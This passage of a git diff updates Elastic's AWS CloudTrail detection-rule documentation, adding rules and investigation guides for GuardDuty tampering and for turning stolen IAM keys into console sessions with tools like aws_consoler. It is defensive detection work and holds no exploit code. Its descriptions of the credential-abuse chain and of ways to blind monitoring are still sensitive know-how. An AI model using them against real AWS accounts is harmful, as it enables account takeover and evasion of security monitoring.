`aws.cloudtrail.request_parameters`. +- Review Kubernetes audit logs for the affected cluster in the time window between the `CreateAccessEntry` and `DeleteAccessEntry` events. Look for `create` verbs on ClusterRoleBindings, RoleBindings, ServiceAccounts, or DaemonSets. +- Check the cluster's current RBAC configuration for persistent backdoor resources. +- Determine whether the identity had a legitimate reason to create an access entry for the targeted cluster. + + +*False positive analysis* + + +- Infrastructure-as-code and CI/CD pipelines that create and tear down EKS access entries as part of cluster validation — Terraform or eksctl apply/destroy cycles, ephemeral test clusters — will produce this exact sequence. Correlate with the pipeline identity and change records before triaging further. +- Short-lived break-glass or just-in-time administrative access that is granted and revoked by the same operator within minutes is legitimate; confirm against access-request tickets or change approvals. +- Migration tooling that switches clusters between authentication modes may churn access entries in bulk under a single automation role. +- The sequence correlates on the calling identity only, so confirm the `CreateAccessEntry` and `DeleteAccessEntry` events reference the same cluster and principal ARN in the request parameters before treating them as one grant-and-revoke cycle. +- Scope any exceptions by the calling ARN or automation role rather than excluding the behavior globally. + + +*Response and remediation* + + +- Audit all Kubernetes RBAC resources for unauthorized ClusterRoleBindings or privileged ServiceAccounts created in the suspect window. +- Rotate credentials for the calling identity. +- Apply IAM policies restricting `eks:CreateAccessEntry` and `eks:DeleteAccessEntry` to designated EKS administrative roles. + + +==== Setup + + +The AWS integration must be ingesting management events into `logs-aws.cloudtrail-*`. EKS management events are logged by default. + +==== Rule query + + +[source, js] +---------------------------------- +sequence by aws.cloudtrail.user_identity.arn with maxspan=5m + [any where data_stream.dataset == "aws.cloudtrail" and event.provider == "eks.amazonaws.com" and event.action == "CreateAccessEntry" and event.outcome == "success" and aws.cloudtrail.user_identity.arn != null] + [any where data_stream.dataset == "aws.cloudtrail" and event.provider == "eks.amazonaws.com" and event.action == "DeleteAccessEntry" and event.outcome == "success" and aws.cloudtrail.user_identity.arn != null] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Container Cluster Roles +** ID: T1098.006 +** Reference URL: https://attack.mitre.org/techniques/T1098/006/ diff --git a/docs/detections/prebuilt-rules/rule-details/aws-eventbridge-rule-disabled-or-deleted.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-eventbridge-rule-disabled-or-deleted.asciidoc index 406b2d593a..30150f447a 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-eventbridge-rule-disabled-or-deleted.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-eventbridge-rule-disabled-or-deleted.asciidoc @@ -28,13 +28,14 @@ Identifies when an Amazon EventBridge rule is disabled or deleted. EventBridge r *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS EventBridge +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS EventBridge * Tactic: Impact +* Rule Type: Custom Query (KQL) * Resources: Investigation Guide -*Version*: 213 +*Version*: 214 *Rule authors*: @@ -138,6 +139,7 @@ data_stream.dataset: aws.cloudtrail and event.provider: events.amazonaws.com and event.action: (DeleteRule or DisableRule) and event.outcome: success + and not user_agent.original: (*Terraform* or *Pulumi*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-getfederationtoken-followed-by-console-login-via-federation-exchange.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-getfederationtoken-followed-by-console-login-via-federation-exchange.asciidoc new file mode 100644 index 0000000000..e20da5574e --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/aws-getfederationtoken-followed-by-console-login-via-federation-exchange.asciidoc @@ -0,0 +1,119 @@ +[[aws-getfederationtoken-followed-by-console-login-via-federation-exchange]] +=== AWS GetFederationToken Followed by Console Login via Federation Exchange + +Detects the three-event chain produced by tools like aws_consoler that convert exfiltrated long-term IAM access keys into browser-accessible AWS console sessions: GetFederationToken obtains temporary credentials, GetSigninToken exchanges them for a federation sign-in token via the AWS federation endpoint, and ConsoleLogin confirms the resulting console session was opened — all from the same source IP within two minutes. This sequence is a high-confidence indicator of credential abuse using stolen IAM access keys. + +*Rule type*: eql + +*Rule indices*: + +* logs-aws.cloudtrail-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/STS/latest/APIReference/API_GetFederationToken.html +* https://github.com/NetSPI/aws_consoler +* https://www.netspi.com/blog/technical-blog/cloud-pentesting/gaining-aws-console-access-via-api-keys/ +* https://securitylabs.datadoghq.com/cloud-security-atlas/attacks/accessing-the-aws-console-with-getfederationtoken/ + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS +* Data Source: Amazon Web Services +* Data Source: AWS CloudTrail +* Service: AWS STS +* Service: AWS Sign-In +* Rule Type: Event Correlation (EQL) +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS GetFederationToken Followed by Console Login via Federation Exchange* + + +This rule detects the aws_consoler attack chain: an adversary exfiltrates a long-term IAM access key (AKIA* prefix), runs aws_consoler or equivalent tooling, which calls `GetFederationToken` to obtain temporary credentials and then exchanges them at the AWS federation endpoint (`https://signin.amazonaws.com/federation`) for a signed console URL. Opening that URL triggers a `ConsoleLogin` event from the same source IP, completing the sequence. + +The source IP correlation distinguishes this pattern from coincidental federation activity: both the API call and the browser-based console login originate from the same attacker machine in automated tooling scenarios. + + +*Possible investigation steps* + + +- Identify the IAM user from `aws.cloudtrail.user_identity.arn` in the first event and confirm whether this user and access key are expected to call `GetFederationToken`. +- Review `source.ip` against known infrastructure. A call from an unexpected geography or cloud provider IP range is a strong indicator of exfiltrated key abuse. +- Query CloudTrail for all API calls made during the resulting console session (user identity type `FederatedUser`) in the window following the `ConsoleLogin`. +- Check GitHub, GitLab, CI/CD pipelines, and `.env` files for exposure of the access key. +- Determine whether any sensitive resources were accessed or modified during the console session. + + +*Response and remediation* + + +- Immediately deactivate the long-term access key used in the `GetFederationToken` call. +- Revoke all active sessions for the IAM user. +- Review all actions taken during the federated console session and assess blast radius. +- Rotate all credentials associated with the IAM user. +- Migrate any legitimate federation use cases to IAM Identity Center or AssumeRoleWithWebIdentity. + + +==== Setup + + +The AWS integration must be ingesting management events into `logs-aws.cloudtrail-*`. STS and sign-in management events are logged by default. + +==== Rule query + + +[source, js] +---------------------------------- +sequence by source.ip with maxspan=2m + [any where event.provider == "sts.amazonaws.com" + and event.action == "GetFederationToken" + and event.outcome == "success"] + [any where event.provider == "signin.amazonaws.com" + and event.action == "GetSigninToken" + and event.outcome == "success"] + [any where event.provider == "signin.amazonaws.com" + and event.action == "ConsoleLogin" + and event.outcome == "success"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Forge Web Credentials +** ID: T1606 +** Reference URL: https://attack.mitre.org/techniques/T1606/ diff --git a/docs/detections/prebuilt-rules/rule-details/aws-guardduty-detector-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-guardduty-detector-deletion.asciidoc index 32fa57570a..470247abde 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-guardduty-detector-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-guardduty-detector-deletion.asciidoc @@ -27,13 +27,14 @@ Detects the deletion of an Amazon GuardDuty detector. GuardDuty provides continu *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS GuardDuty +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS GuardDuty * Tactic: Defense Evasion +* Rule Type: Custom Query (KQL) * Resources: Investigation Guide -*Version*: 212 +*Version*: 213 *Rule authors*: @@ -129,6 +130,7 @@ data_stream.dataset: aws.cloudtrail and event.provider: guardduty.amazonaws.com and event.action: DeleteDetector and event.outcome: success + and not user_agent.original: (*Terraform* or *Pulumi*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-guardduty-publishing-destination-deleted.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-guardduty-publishing-destination-deleted.asciidoc new file mode 100644 index 0000000000..c75c032898 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/aws-guardduty-publishing-destination-deleted.asciidoc @@ -0,0 +1,111 @@ +[[aws-guardduty-publishing-destination-deleted]] +=== AWS GuardDuty Publishing Destination Deleted + +Detects the deletion of an Amazon GuardDuty publishing destination. Publishing destinations export GuardDuty findings to S3, Security Lake, or EventBridge for long-term retention and SIEM ingestion. An adversary with GuardDuty administrative access may delete a publishing destination to prevent findings from reaching external storage or a security operations center, reducing the visibility of their activity while leaving the GuardDuty detector active. + +*Rule type*: query + +*Rule indices*: + +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/guardduty/latest/APIReference/API_DeletePublishingDestination.html +* https://hackingthe.cloud/aws/avoiding-detection/modify-guardduty-config/ + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS GuardDuty +* Rule Type: Custom Query (KQL) +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS GuardDuty Publishing Destination Deleted* + + +Amazon GuardDuty publishing destinations export threat findings to S3 buckets, Amazon Security Lake, or EventBridge buses for retention and downstream SIEM ingestion. Deleting a publishing destination severs this pipeline: findings still appear in the GuardDuty console but are no longer exported, making it harder for security operations to correlate GuardDuty alerts with other event sources. + +This action is uncommon in production environments. Legitimate deletions occur during planned migrations to a new destination or when decommissioning GuardDuty in an account. + + +*Possible investigation steps* + + +- Identify the caller from `aws.cloudtrail.user_identity.arn` and `user.name`. Verify this identity has a documented reason to modify GuardDuty configuration. +- Check `aws.cloudtrail.request_parameters` for the destination ID and detector ID. Query GuardDuty to confirm whether any publishing destination remains configured. +- Review CloudTrail for other GuardDuty control-plane actions by the same identity in the surrounding time window: `DeleteDetector`, `UpdateDetector`, `CreateFilter`, `CreateIPSet`. +- Determine whether a replacement destination was configured before or after the deletion. +- Correlate with IAM changes that may have granted GuardDuty administrative access to the calling identity. + + +*Response and remediation* + + +- If unauthorized, immediately re-create the publishing destination to restore findings export. +- Rotate credentials for the calling identity and review all actions taken by those credentials. +- Apply an SCP or IAM policy restricting `guardduty:DeletePublishingDestination` to a dedicated security operations role. +- Review GuardDuty member account configurations to confirm the action was not replicated across multiple accounts. + + +==== Setup + + +The AWS integration must be ingesting management events into `logs-aws.cloudtrail-*`. GuardDuty management events are logged by default. + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "aws.cloudtrail" + and event.provider: "guardduty.amazonaws.com" + and event.action: "DeletePublishingDestination" + and event.outcome: "success" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/aws-guardduty-threat-intelligence-set-deleted.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-guardduty-threat-intelligence-set-deleted.asciidoc new file mode 100644 index 0000000000..3ddc046309 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/aws-guardduty-threat-intelligence-set-deleted.asciidoc @@ -0,0 +1,110 @@ +[[aws-guardduty-threat-intelligence-set-deleted]] +=== AWS GuardDuty Threat Intelligence Set Deleted + +Detects the deletion of an Amazon GuardDuty threat intelligence set. Threat intelligence sets are custom lists of known-malicious IP addresses or domains that GuardDuty uses to generate findings when monitored resources communicate with those indicators. Deleting a threat intel set degrades GuardDuty's detection capability for known adversary infrastructure, allowing communication with threat-actor-controlled IP ranges to go undetected. + +*Rule type*: query + +*Rule indices*: + +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/guardduty/latest/APIReference/API_DeleteThreatIntelSet.html +* https://hackingthe.cloud/aws/avoiding-detection/modify-guardduty-config/ + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS GuardDuty +* Rule Type: Custom Query (KQL) +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS GuardDuty Threat Intelligence Set Deleted* + + +GuardDuty threat intelligence sets allow security teams to upload custom lists of known-malicious IP addresses and domains. GuardDuty generates high-priority findings when monitored resources contact addresses in these sets. Deleting a threat intel set reduces GuardDuty's ability to detect communication with known adversary infrastructure. + +Legitimate deletions occur during feed rotation (replacing an old set with an updated version) or when decommissioning a threat intel feed. Both operations should be planned and documented. + + +*Possible investigation steps* + + +- Identify the caller from `aws.cloudtrail.user_identity.arn` and `user.name`. +- Check `aws.cloudtrail.request_parameters` for the threat intel set ID and detector ID. Determine whether any threat intel sets remain active in the detector. +- Review CloudTrail for adjacent GuardDuty control-plane modifications: `CreateThreatIntelSet`, `UpdateThreatIntelSet`, `CreateIPSet`, `UpdateIPSet`, `DeleteDetector`, `CreateFilter`. +- Determine whether a replacement threat intel set was created before or after the deletion. +- Correlate with other defense-evasion indicators such as GuardDuty detector updates or suppression rule creation. + + +*Response and remediation* + + +- Re-create or restore the threat intelligence set if the deletion was unauthorized. +- Rotate credentials for the calling identity and review all actions taken by those credentials. +- Apply an SCP or IAM policy restricting `guardduty:DeleteThreatIntelSet` to a dedicated security operations role. + + +==== Setup + + +The AWS integration must be ingesting management events into `logs-aws.cloudtrail-*`. GuardDuty management events are logged by default. + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "aws.cloudtrail" + and event.provider: "guardduty.amazonaws.com" + and event.action: "DeleteThreatIntelSet" + and event.outcome: "success" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/aws-iam-customer-managed-policy-version-created-or-default-version-set.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-iam-customer-managed-policy-version-created-or-default-version-set.asciidoc index 45293d5fb0..fae9e1673a 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-iam-customer-managed-policy-version-created-or-default-version-set.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-iam-customer-managed-policy-version-created-or-default-version-set.asciidoc @@ -30,14 +30,14 @@ Identifies successful IAM API calls that create a new customer managed policy ve * Domain: Cloud * Domain: Identity -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS IAM -* Use Case: Threat Detection +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS IAM * Tactic: Privilege Escalation +* Rule Type: Custom Query (KQL) * Resources: Investigation Guide -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -104,6 +104,7 @@ event.dataset: "aws.cloudtrail" and not aws.cloudtrail.user_identity.arn:arn*/terraform and not source.as.organization.name:(Amazon* or AMAZON* or "Google LLC" or "MongoDB, Inc.") and not source.address: ( "cloudformation.amazonaws.com" or "servicecatalog.amazonaws.com") + and not user_agent.original: (*Terraform* or *Pulumi*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-iam-login-profile-added-to-user.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-iam-login-profile-added-to-user.asciidoc index 1298f8d053..3647d2f7c1 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-iam-login-profile-added-to-user.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-iam-login-profile-added-to-user.asciidoc @@ -25,14 +25,13 @@ Identifies when an AWS IAM login profile is added to a user. Adversaries may add *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS IAM -* Use Case: Identity and Access Audit +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS IAM * Tactic: Persistence * Rule Type: BBR -*Version*: 5 +*Version*: 6 *Rule authors*: @@ -48,6 +47,7 @@ Identifies when an AWS IAM login profile is added to a user. Adversaries may add ---------------------------------- event.dataset: aws.cloudtrail and event.provider: "iam.amazonaws.com" and event.action: "CreateLoginProfile" and event.outcome: success + and not user_agent.original: (*Terraform* or *Pulumi*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-iam-oidc-provider-created-by-rare-user.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-iam-oidc-provider-created-by-rare-user.asciidoc index fcb06cf101..ad924c8d50 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-iam-oidc-provider-created-by-rare-user.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-iam-oidc-provider-created-by-rare-user.asciidoc @@ -29,14 +29,14 @@ Detects when an uncommon user or role creates an OpenID Connect (OIDC) Identity *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS IAM -* Use Case: Identity and Access Audit +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS IAM * Tactic: Persistence +* Rule Type: New Terms * Resources: Investigation Guide -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -134,6 +134,7 @@ data_stream.dataset: "aws.cloudtrail" and event.provider: "iam.amazonaws.com" and event.action: "CreateOpenIDConnectProvider" and event.outcome: "success" + and not user_agent.original: (*Terraform* or *eksctl*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-iam-user-created-access-keys-for-another-user.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-iam-user-created-access-keys-for-another-user.asciidoc index 78657cba32..b8f32e4e40 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-iam-user-created-access-keys-for-another-user.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-iam-user-created-access-keys-for-another-user.asciidoc @@ -27,15 +27,15 @@ An adversary with access to a set of compromised credentials may attempt to pers *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS IAM -* Use Case: Identity and Access Audit -* Tactic: Privilege Escalation +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS IAM * Tactic: Persistence +* Tactic: Privilege Escalation +* Rule Type: ESQL * Resources: Investigation Guide -*Version*: 14 +*Version*: 15 *Rule authors*: @@ -152,6 +152,9 @@ from logs-aws.cloudtrail-* metadata _id, _version, _index and event.action == "CreateAccessKey" and event.outcome == "success" and user.name != user.target.name + and not to_lower(user_agent.original) like "*terraform*" + and not to_lower(user_agent.original) like "*pulumi*" + and not to_lower(user_agent.original) like "*ansible*" | keep @timestamp, cloud.account.id, diff --git a/docs/detections/prebuilt-rules/rule-details/aws-kms-customer-managed-key-disabled-or-scheduled-for-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-kms-customer-managed-key-disabled-or-scheduled-for-deletion.asciidoc index 569e0972d9..0ba1b8ca7d 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-kms-customer-managed-key-disabled-or-scheduled-for-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-kms-customer-managed-key-disabled-or-scheduled-for-deletion.asciidoc @@ -28,14 +28,14 @@ Identifies attempts to disable or schedule the deletion of an AWS customer manag *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS KMS -* Use Case: Log Auditing +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS KMS * Tactic: Impact +* Rule Type: Custom Query (KQL) * Resources: Investigation Guide -*Version*: 113 +*Version*: 114 *Rule authors*: @@ -160,6 +160,7 @@ data_stream.dataset: "aws.cloudtrail" and event.provider: "kms.amazonaws.com" and event.action: ("DisableKey" or "ScheduleKeyDeletion") and event.outcome: "success" + and not user_agent.original: (*Terraform* or *Pulumi*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-kms-key-policy-updated-via-putkeypolicy.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-kms-key-policy-updated-via-putkeypolicy.asciidoc index 503cada9fc..a930dd926d 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-kms-key-policy-updated-via-putkeypolicy.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-kms-key-policy-updated-via-putkeypolicy.asciidoc @@ -28,15 +28,15 @@ Identifies successful PutKeyPolicy calls on AWS KMS keys. The key policy is a re *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS KMS -* Use Case: Threat Detection +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS KMS * Tactic: Defense Evasion * Tactic: Privilege Escalation +* Rule Type: Custom Query (KQL) * Resources: Investigation Guide -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -101,6 +101,7 @@ event.dataset: "aws.cloudtrail" and event.action: "PutKeyPolicy" and event.outcome: "success" and not aws.cloudtrail.user_identity.type: "AWSService" + and not user_agent.original: (*Terraform* or *Pulumi*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-lambda-function-created-or-updated.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-lambda-function-created-or-updated.asciidoc index a83334274e..159730b6b1 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-lambda-function-created-or-updated.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-lambda-function-created-or-updated.asciidoc @@ -29,14 +29,13 @@ Identifies when an AWS Lambda function is created or updated. AWS Lambda lets yo *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS Lambda -* Use Case: Asset Visibility +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS Lambda * Tactic: Execution * Rule Type: BBR -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -54,6 +53,7 @@ event.dataset: "aws.cloudtrail" and event.provider: "lambda.amazonaws.com" and event.outcome: "success" and event.action: (CreateFunction* or UpdateFunctionCode*) + and not user_agent.original: (*Terraform* or *Pulumi*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-lambda-function-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-lambda-function-deletion.asciidoc index b53609d3cf..31d973f032 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-lambda-function-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-lambda-function-deletion.asciidoc @@ -27,14 +27,14 @@ Identifies the deletion of an AWS Lambda function. Deleting a function removes i *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS Lambda -* Use Case: Threat Detection +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS Lambda * Tactic: Impact +* Rule Type: Custom Query (KQL) * Resources: Investigation Guide -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -98,6 +98,7 @@ data_stream.dataset: "aws.cloudtrail" and event.provider: "lambda.amazonaws.com" and event.action: (DeleteFunction or DeleteFunction20*) and event.outcome: "success" + and not user_agent.original: (*Terraform* or *Pulumi*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-lambda-function-policy-updated-to-allow-public-invocation.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-lambda-function-policy-updated-to-allow-public-invocation.asciidoc index a14dae84d0..8701bca408 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-lambda-function-policy-updated-to-allow-public-invocation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-lambda-function-policy-updated-to-allow-public-invocation.asciidoc @@ -29,14 +29,14 @@ Identifies when an AWS Lambda function policy is updated to allow public invocat *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS Lambda -* Use Case: Threat Detection +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS Lambda * Tactic: Persistence +* Rule Type: Event Correlation (EQL) * Resources: Investigation Guide -*Version*: 9 +*Version*: 10 *Rule authors*: @@ -126,6 +126,7 @@ info where data_stream.dataset == "aws.cloudtrail" and event.action : "AddPermission*" and stringContains(aws.cloudtrail.request_parameters, "lambda:InvokeFunction") and stringContains(aws.cloudtrail.request_parameters, "principal=\\*") + and not user_agent.original like~ ("*Terraform*", "*Pulumi*") ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-lambda-function-url-created-with-public-access.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-lambda-function-url-created-with-public-access.asciidoc index a24c5728e7..183d21226c 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-lambda-function-url-created-with-public-access.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-lambda-function-url-created-with-public-access.asciidoc @@ -27,15 +27,15 @@ Identifies the creation or update of an AWS Lambda function URL configured with *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS Lambda -* Use Case: Threat Detection -* Tactic: Persistence +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS Lambda * Tactic: Defense Evasion +* Tactic: Persistence +* Rule Type: Event Correlation (EQL) * Resources: Investigation Guide -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -103,6 +103,7 @@ any where data_stream.dataset == "aws.cloudtrail" and not (aws.cloudtrail.user_identity.arn : "*terraform*" or aws.cloudtrail.user_identity.arn : "*pulumi*" or aws.cloudtrail.user_identity.arn : "*ansible*") and (event.action : "CreateFunctionUrlConfig*" or event.action : "UpdateFunctionUrlConfig*") and stringContains(aws.cloudtrail.request_parameters, "authType=NONE") + and not user_agent.original like~ ("*Terraform*", "*Pulumi*") ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-lambda-layer-added-to-existing-function.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-lambda-layer-added-to-existing-function.asciidoc index c637f043cf..b8cd6ae32f 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-lambda-layer-added-to-existing-function.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-lambda-layer-added-to-existing-function.asciidoc @@ -29,14 +29,14 @@ Identifies when a Lambda layer is added to an existing AWS Lambda function. Lamb *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS Lambda -* Use Case: Threat Detection +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS Lambda * Tactic: Execution +* Rule Type: Custom Query (KQL) * Resources: Investigation Guide -*Version*: 9 +*Version*: 10 *Rule authors*: @@ -121,6 +121,7 @@ data_stream.dataset: aws.cloudtrail and event.provider: lambda.amazonaws.com and event.outcome: success and event.action: (PublishLayerVersion* or UpdateFunctionConfiguration*) + and not user_agent.original: (*Terraform* or *Pulumi*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-rds-db-instance-made-public.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-rds-db-instance-made-public.asciidoc index 707c1f860c..1de9107130 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-rds-db-instance-made-public.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-rds-db-instance-made-public.asciidoc @@ -30,15 +30,15 @@ Identifies the creation or modification of an Amazon RDS DB instance or cluster *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS RDS -* Resources: Investigation Guide -* Use Case: Threat Detection -* Tactic: Persistence +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS RDS * Tactic: Defense Evasion +* Tactic: Persistence +* Rule Type: Event Correlation (EQL) +* Resources: Investigation Guide -*Version*: 9 +*Version*: 10 *Rule authors*: @@ -160,6 +160,7 @@ any where data_stream.dataset == "aws.cloudtrail" or (event.action in ("CreateDBInstance", "CreateDBCluster") and stringContains(aws.cloudtrail.request_parameters, "publiclyAccessible=true")) ) + and not user_agent.original like~ ("*Terraform*", "*Pulumi*") ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-rds-db-instance-or-cluster-deleted.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-rds-db-instance-or-cluster-deleted.asciidoc index cf968c5268..a5d1c1cd2e 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-rds-db-instance-or-cluster-deleted.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-rds-db-instance-or-cluster-deleted.asciidoc @@ -29,14 +29,14 @@ Identifies the deletion of an Amazon RDS DB instance, Aurora cluster, or global *Tags*: * Domain: Cloud -* 